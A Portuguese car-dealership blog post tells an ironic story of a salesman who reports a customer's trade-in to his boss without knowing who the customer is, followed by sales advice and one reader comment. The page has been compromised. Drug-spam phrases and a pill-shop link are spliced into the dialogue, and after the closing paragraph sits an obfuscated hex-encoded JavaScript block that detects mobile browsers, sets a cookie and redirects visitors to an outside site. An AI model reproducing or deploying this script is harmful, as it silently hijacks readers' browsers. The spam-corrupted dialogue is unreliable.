Posted by IN / 1 response

Oh Chefe, a essa parte ainda não cheguei…

19 November 2015

20 de setembro de 2015. Aparentemente um dia como tantos outros.

Raio das vendas! O mês de agosto não tinha ajudado nada e já estávamos no mês de setembro e a pouco mais de 3 meses do final do ano.
O ano anterior tinha sido fantástico: 57 vendas! Para um vendedor com 3 anos de experiência era muito satisfatório. Aliás, com este resultado, estava nos primeiros lugares do ranking da equipa. Mas, caramba, isto dos automóveis é tramado! No dia 31 somos uns heróis e no dia 19 do mês seguinte, quando os resultados não são os desejáveis, já nos estão a dizer: «Então, não estou a perceber… só 2 carros este mês?!?!». E se no dia 20 de setembro só temos 38 vendas no ano, então, aí, a vontade é voltar para onde estávamos antes de abraçar esta profissão.
Ganhava pouco era certo, mas entrava às 9:00 e saía às 18:00, tinha tempo para o meu filho, para o ginásio, todas as 3ª, 5ª e Sábados dava a minha “voltinha” de bicicleta de mais de uma hora lá em baixo no Parque…

«Tudo bem! Mas não são formas de falar comigo. É chefe, certo, mas eu também sou gente. Tive lá eu culpa que o cliente não tenha querido dar o telefone?!?! Se ele disse que só queira saber valores… é porque só queria saber valores!»

Com estes pensamentos, apercebe-se de uma sombra a entrar pelo Stand. São 10:45.

«A avaliar pelo aspeto, não é um cliente para a nossa marca, estou certo.Bom, é mais outro que só deve querer saber valores…»

Bom dia!
Bom dia! to order at a low price generic pills on line – http://ullieudhunk.mhs.narotama.ac.id/2016/11/30/to-order-at-a-low-price-generic-pills-on-line/ – saúda o cliente.
Mário Antunes get at low price drugs without a doctor – diz o Vendedor – Em que posso ajudar?
Olhe, tenho andado a ver noutras marcas. Gosto muito deste modelo aqui e daquele ali junto ao vidro e gostava de saber mais informações.

O Vendedor pensa: «claro só pode, mais um que só quer saber informações. Pelo aspeto e a deitar assim a beata no chão… Sapatos gastos….Só pode ser mais um que me vai fazer perder tempo!»

E o que deseja saber? Já conhece as viaturas?
Mais ou menos. – diz o cliente.

E como que clicando no botão play do seu leitor de DVD, lá vai o filme em tons de cor-de-rosa:

Ambas utilizam a mesma tecnologia. São viaturas de segmentos diferentes, tendo 145 e 165 cavalos, respetivamente. Têm… e também tem… e é bom.. porque .. e tem…etc. Etc..

O cliente interrompe…
-Olhe, eu tenho um Megáne de 2007, quanto pode valer?
-Bom, para isso tenho que fazer primeiro a avaliação, mas tenho que ver o carro!
-É aquele ali fora – apontando de rompante para o Megáne mesmo ali ao fundo no parque.
-OK!

Aparentemente um OK seco saído da boca do vendedor, mas com um certo sabor doce pelo auto convencimento de que afinal poderia ser mesmo um cliente interessado em comprar.

«Pelos vistos “ELE” até é mesmo para comprar. Yessss!»

E tomando o bloco das avaliações dá passos decisivos na direção da Viatura do Cliente. O cliente vai marcando a passe de trote com a batuta nos lábios em jeito de chefe de fanfarra:

-Bom, o meu Megáne está bom, só que… bom .. tem tudo, pois na altura eu sempre achei que seria melhor assim… já andei a ver valores e se não me derem um valor justo eu até continuo com ele.

O vendedor, após algumas notas na Ficha de Avaliação, exclama:
-Bom, vamos ver. Vou já falar com o nosso responsável dos Usados e já vemos isso tudo, OK?

E sem esperar resposta dá meia volta em passo acelerado alimentado pelo pensamento:

«Caramba este vem mesmo a calhar. Se o chefe me der um valor bom, ainda pode dar para matricular mais um este mês. Estou safo!»

A ansiedade pela venda abraçava-lhe o rosto. Olhos bem abertos, com um certo ar de pressa nas palavras como quem acaba de responder ao 112 e já de sirene ligada em marcha rápida, lá ia dizendo ainda a 10 metros do Chefe:

-Oh Chefe .. oh Chefe .. quanto vale um Megáne de 2007? O carro está novinho… em bom estado … o cliente disse que se…”
-OK! É para que negócio?
-Ele gosta do Modelo X e Y, vamos ver…
-O que é que o cliente faz?
-A essa parte ainda não cheguei… mas ele quer comprar, eu acho…
-O senhor é de onde?
-Oh Chefe, essa parte ainda não deu para ver…
-E vai fazer o Test Drive de qual?
-Ainda não vi isso, vou já ver também…

E a cada pergunta do chefe a resposta saia seca e cada vez mais seca:

A essa parte ainda não cheguei

ou

O Cliente não me disse!

Embora em tom irónico e felizmente não retratando a realidade da maior parte dos nossos profissionais, também toca o cerne da questão: o que é afinal Vender? O que é afinal ser vendedor? O que é ser compromissus?

Por vezes alimentados pela vontade de sermos bem sucedidos, entramos cheios de sonhos, anunciando nas nossas casas um futuro cheio de sucessos inebriados pela potência dos 170 cavalos de cada viatura que tocam! Ou até mesmo acreditando estar a realizar um sonho de infância!
Mas aqui o desafio de todos os dias é ser vendedor… fazer o nosso papel de profissionais que, com determinação, atitude, persistência, humildade, todos os dias e depois das pancadas de Molière, entramos em cena para cumprir a nossa Missão:

Cumprir com o objetivo de vendas, vender com valor, cultivando a relação, com qualidade e rentabilidade!

3var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

one response to Oh Chefe, a essa parte ainda não cheguei…

  • Daniela Miranda says on August 20, 2016 at 10:03 pm

    Como Fernando Silva mencionou em entrevista à AP MAGAZINE, o Focus no Focus do Cliente continua a ser a chave do sucesso nas vendas. É preciso acolher o cliente (de onde vem? o que faz? tem família? 1, 2, 3 ou 4 filhos?), identificar as suas necessidades (pretende um carro familiar ou um carro comercial para trabalhar? faz muitos quilometros em autoestrada? ou movimenta-se sobretudo dentro da cidade? carro a gasóleo ou a gasolina?), analisar o portfólio que a empresa dispõe e, posteriormente, apresentar as opções que parecem adequar-se ao solicitado. Mais do que simplesmente vender por vender para atingir os objetivos de vendas, interessa fazê-lo com empenho e apontar soluções que sejam satisfatórias quer para o cliente quer para o vendedor.

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>